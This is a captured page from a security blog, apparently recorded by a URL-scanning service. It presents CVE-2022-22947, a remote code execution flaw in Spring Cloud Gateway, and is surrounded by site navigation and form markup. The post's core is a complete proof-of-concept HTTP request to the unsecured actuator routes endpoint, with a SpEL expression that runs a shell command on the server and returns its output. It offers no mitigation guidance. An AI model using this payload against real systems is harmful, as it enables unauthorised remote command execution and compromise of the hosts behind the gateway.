reconshell.com Open in urlscan Pro
3.66.136.156  Public Scan

URL: https://reconshell.com/cve-2022-22947-spring-cloud-gateway-rce/
Submission: On May 18 via api from US — Scanned from DE

Form analysis 5 forms found in the DOM

GET https://reconshell.com/

<form role="search" method="get" class="search-form" action="https://reconshell.com/">
  <label>
    <span class="screen-reader-text">Search for:</span>
    <input type="search" class="search-field" placeholder="Search …" value="" name="s">
  </label>
  <input type="submit" class="search-submit" value="Search">
</form>

GET https://reconshell.com/

<form role="search" method="get" class="search-form" action="https://reconshell.com/">
  <label>
    <span class="screen-reader-text">Search for:</span>
    <input type="search" class="search-field" placeholder="Search …" value="" name="s">
  </label>
  <input type="submit" class="search-submit" value="Search">
</form>

GET https://reconshell.com/

<form role="search" method="get" class="search-form" action="https://reconshell.com/">
  <label>
    <span class="screen-reader-text">Search for:</span>
    <input type="search" class="search-field" placeholder="Search …" value="" name="s">
  </label>
  <input type="submit" class="search-submit" value="Search">
</form>

GET https://reconshell.com/

<form role="search" method="get" class="search-form" action="https://reconshell.com/">
  <label>
    <span class="screen-reader-text">Search for:</span>
    <input type="search" class="search-field" placeholder="Search …" value="" name="s">
  </label>
  <input type="submit" class="search-submit" value="Search">
</form>

POST https://reconshell.com/wp-comments-post.php

<form action="https://reconshell.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate="">
  <p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message" aria-hidden="true">Required fields are marked <span class="required" aria-hidden="true">*</span></span></p>
  <p class="comment-form-comment"><label for="comment">Comment <span class="required" aria-hidden="true">*</span></label> <textarea placeholder="Leave Your Comment" id="comment" name="comment" cols="45" rows="8" maxlength="65525"
      required=""></textarea></p>
  <p class="comment-form-author"><label for="author">Name <span class="required" aria-hidden="true">*</span></label> <input placeholder="Name" id="author" name="author" type="text" value="" size="30" maxlength="245" required=""></p>
  <p class="comment-form-email"><label for="email">Email <span class="required" aria-hidden="true">*</span></label> <input placeholder="Email" id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes"
      required=""></p>
  <p class="comment-form-url"><label for="url">Website</label> <input placeholder="Website" id="url" name="url" type="url" value="" size="30" maxlength="200"></p>
  <p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes"> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time
      I comment.</label></p>
  <p class="form-submit"><input name="submit" type="submit" id="submit" class="btn-wrap" value="Post Comment"> <input type="hidden" name="comment_post_ID" value="8107" id="comment_post_ID">
    <input type="hidden" name="comment_parent" id="comment_parent" value="0">
  </p>
</form>

Text Content

Verstanden!

Wir verwenden Cookies um Inhalte und Anzeigen zu personalisieren, um
Social-Media-Funktionen zur Verfügung zu stellen und unseren Traffic zu
analysieren. Wir teilen auch Informationen über Ihre Nutzung unserer Website mit
unseren Social Media-, Werbe- und Analysepartnern. Details anzeigen

Cookie Consent plugin for the EU cookie law
 * Data Science
   
   * Artificial Intelligence
   * Data Analyst
   * Deep Learning
   * Machine Learning
 * Kali
   
   * Exploits
   * OSINT
   * Tools
   * Bug Bounty
   * Resources
 * Linux
   
   * DevOps
   * Docker
   * Kubernetes
   * Git
 * Forensics
   
   * Cyber Forensics
   * Digital Forensics
   * Linux Forensics
   * Network Forensics
   * Threat Analyst
   * Incident Response
 * SQL
 * CVE
 * Share
 * News
 * Services
   
   * CrackMyHash

 * Small Business
 * Resources
 * White Papers
 * Crypto News
 * Programming
   * Python
   * NodeJS
   * Java
   * Javascript
   * PHP
 * Android
 * SEO
 * Microsoft
   * Azure
   * Dot Net
   * Powershell
 * Networking


Search for:
Search for:
 * Data Science
    * Artificial Intelligence
    * Data Analyst
    * Deep Learning
    * Machine Learning
   
   AI, ML AND DATA SCIENCE BOOKS
   
   
   
   USEFUL DATA SCIENCE TOPICS
   
   
   
   DATA SCIENCE BLOGS
   
   
   
   DATA SCIENCE RESOURCES
   
   
   Previous Next
 * Kali
    * Exploits
    * OSINT
    * Tools
    * Bug Bounty
    * Resources
   
   THE FIRMWARE SECURITY ANALYZER
   
   
   
   APACHE TOMCAT RCE
   
   
   
   REDTEAM PHYSICAL TOOLS
   
   
   
   SEARCHMAP INFORMATION COLLECTION TOOL
   
   
   Previous Next
 * Linux
    * DevOps
    * Docker
    * Kubernetes
    * Git
   
   GIT CHEAT SHEET
   
   
   
   DEVSECOPS PLAYBOOK
   
   
   
   K3S – LIGHTWEIGHT KUBERNETES
   
   
   
   LINUX CHEAT SHEET
   
   
   Previous Next
 * Forensics
    * Cyber Forensics
    * Digital Forensics
    * Linux Forensics
    * Network Forensics
    * Threat Analyst
    * Incident Response
   
   DIGITAL FORENSICS GUIDE
   
   
   
   DIGITAL FORENSICS AND INCIDENT RESPONSE SOC
   
   
   
   TRACKING HISTORY OF USB EVENTS ON LINUX
   
   
   
   CYBER SECURITY FORENSICS
   
   
   Previous Next
 * SQL
   
   THE RUST SQL TOOLKIT
   
   
   
   POSTGRES TO ELASTICSEARCH SYNC
   
   
   
   AWESOME SQL SERVER
   
   
   
   UNIVERSAL COMMAND LINE INTERFACE FOR SQL DATABASES
   
   
   
   AWESOME MYSQL RESOURCES
   
   
   Previous Next
 * CVE
 * Share
 * News
 * Services
   * CrackMyHash

Search for:

 * Data Science
    * Artificial Intelligence
    * Data Analyst
    * Deep Learning
    * Machine Learning
   
   AI, ML AND DATA SCIENCE BOOKS
   
   
   
   USEFUL DATA SCIENCE TOPICS
   
   
   
   DATA SCIENCE BLOGS
   
   
   
   DATA SCIENCE RESOURCES
   
   
   Previous Next
 * Kali
    * Exploits
    * OSINT
    * Tools
    * Bug Bounty
    * Resources
   
   THE FIRMWARE SECURITY ANALYZER
   
   
   
   APACHE TOMCAT RCE
   
   
   
   REDTEAM PHYSICAL TOOLS
   
   
   
   SEARCHMAP INFORMATION COLLECTION TOOL
   
   
   Previous Next
 * Linux
    * DevOps
    * Docker
    * Kubernetes
    * Git
   
   GIT CHEAT SHEET
   
   
   
   DEVSECOPS PLAYBOOK
   
   
   
   K3S – LIGHTWEIGHT KUBERNETES
   
   
   
   LINUX CHEAT SHEET
   
   
   Previous Next
 * Forensics
    * Cyber Forensics
    * Digital Forensics
    * Linux Forensics
    * Network Forensics
    * Threat Analyst
    * Incident Response
   
   DIGITAL FORENSICS GUIDE
   
   
   
   DIGITAL FORENSICS AND INCIDENT RESPONSE SOC
   
   
   
   TRACKING HISTORY OF USB EVENTS ON LINUX
   
   
   
   CYBER SECURITY FORENSICS
   
   
   Previous Next
 * SQL
   
   THE RUST SQL TOOLKIT
   
   
   
   POSTGRES TO ELASTICSEARCH SYNC
   
   
   
   AWESOME SQL SERVER
   
   
   
   UNIVERSAL COMMAND LINE INTERFACE FOR SQL DATABASES
   
   
   
   AWESOME MYSQL RESOURCES
   
   
   Previous Next
 * CVE
 * Share
 * News
 * Services
   * CrackMyHash

Search for:

Exploits


CVE-2022-22947 SPRING CLOUD GATEWAY RCE

Posted by Stella Sebastian March 5, 2022




CVE-2022-22947 RCE

--------------------------------------------------------------------------------



Spring Cloud Gateway provides a library for building an API Gateway on top of
Spring WebFlux.

Applications using Spring Cloud Gateway in the version prior to 3.1.0 and 3.0.6,
are vulnerable to a code injection attack when the Gateway Actuator endpoint is
enabled, exposed and unsecured. A remote attacker could make a maliciously
crafted request that could allow arbitrary remote execution on the remote host.


REFERENCES:

https://tanzu.vmware.com/security/cve-2022-22947
https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/


POC

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329
{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}


EXP

> The CVE-2022-22947 RCE is a github repository by shakeman8

--------------------------------------------------------------------------------

Source from
vulnerability scanner for container






Tags: BugBountry CodeExecution CVE-2022-22947 exploit Hacking RCE Spring Cloud
Gateway Spring Cloud Gateway RCE
0 Shares
Share on Facebook Share on Twitter Share on Pinterest Share on Email
Stella Sebastian March 5, 2022
Previous Article Moonbeam Coin Price Prediction
Next Article Information Gathering Engine

LEAVE A REPLY


LEAVE A REPLY CANCEL REPLY

Your email address will not be published. Required fields are marked *

Comment *

Name *

Email *

Website

Save my name, email, and website in this browser for the next time I comment.




REPORT THIS ADLATEST POSTS

THE FIRMWARE SECURITY ANALYZER

May 18, 2022

GIT CHEAT SHEET

May 17, 2022

APACHE TOMCAT RCE

May 17, 2022

REDTEAM PHYSICAL TOOLS

May 16, 2022
report this ad

report this ad


YOU MIGHT ALSO ENJOY

Tools

THE FIRMWARE SECURITY ANALYZER

May 18, 2022
Tools

APACHE TOMCAT RCE

May 17, 2022
Resources

REDTEAM PHYSICAL TOOLS

May 16, 2022
Python

PYTHON ENGINEER ROADMAP

May 15, 2022
Load More



 * ABOUT
 * ADVERTISEMENT
 * TEAM
 * JOBS
 * CONTACT
 * PRIVACY POLICY
 * DISCLOSURE

© 2021 Reconshell All Rights Reserved.

report this ad


x
x